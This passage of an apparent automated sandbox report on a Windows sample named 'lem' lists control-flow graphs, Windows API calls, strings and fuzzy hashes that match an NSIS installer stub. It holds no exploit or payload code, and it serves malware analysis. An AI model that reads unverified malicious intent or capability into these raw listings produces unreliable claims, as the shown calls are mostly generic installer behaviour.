wsprintfW 4952->4955 4953->4947 4955->4953 4956 404039 4957 404096 4956->4957 4958 404046 lstrcpynA lstrlenA 4956->4958 4958->4957 4959 404077 4958->4959 4959->4957 4960 404083 GlobalFree 4959->4960 4960->4957 4961 401eb9 4962 401f24 4961->4962 4965 401ec6 4961->4965 4963 401f53 GlobalAlloc 4962->4963 4967 401f28 4962->4967 4969 406831 18 API calls 4963->4969 4964 401ed5 4968 4062cf 11 API calls 4964->4968 4965->4964 4971 401ef7 4965->4971 4966 401f36 4985 406035 lstrcpynW 4966->4985 4967->4966 4970 4062cf 11 API calls 4967->4970 4980 401ee2 4968->4980 4973 401f46 4969->4973 4970->4966 4983 406035 lstrcpynW 4971->4983 4975 402708 4973->4975 4976 402387 GlobalFree 4973->4976 4976->4975 4977 401f06 4984 406035 lstrcpynW 4977->4984 4978 406831 18 API calls 4978->4980 4980->4975 4980->4978 4981 401f15 4986 406035 lstrcpynW 4981->4986 4983->4977 4984->4981 4985->4973 4986->4975

Control-flow Graph (graph starting at block 4050f9-405114; node and edge listing not reproduced)
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426976,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
• Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                                                    • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                                                                                    • Opcode ID: bcb774d99f95268555e073945e74a63dc3a3de547f83199e57bf6b1f44cb798b
                                                                                                                                                                                                                                                                                                    • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcb774d99f95268555e073945e74a63dc3a3de547f83199e57bf6b1f44cb798b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Control-flow Graph (graph starting at block 4038af-403945; node and edge listing not reproduced)
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                    • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                    • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                                                    • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                                                    • GetTempPathW.KERNELBASE(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                                                    • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                                    • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                                                    • API String ID: 2435955865-3712954417

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426976,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00426976,759223A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                                    • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                                    • API String ID: 3581403547-1792361021

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                    • String ID: jF
                                                                                                                                                                                                                                                                                                    • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                                                    • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                    • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 310444273-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                                                    • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                                                    • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                                                    • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                                                    • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                                                    • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                                                    • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                                                    • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                                                    • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                                                    • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                                                    • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                                                    • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                                                    • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                                                    • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                                                    • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                                                    • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                                                    • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                                                    • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                                                    • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                                                    • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                                                    • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                                                    • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                                    • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 
373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: b5207720c177ba42d53edf7a9f1d4aab61830a891a9918718410ffa1281e69e3
                                                                                                                                                                                                                                                                                                    • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5207720c177ba42d53edf7a9f1d4aab61830a891a9918718410ffa1281e69e3
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
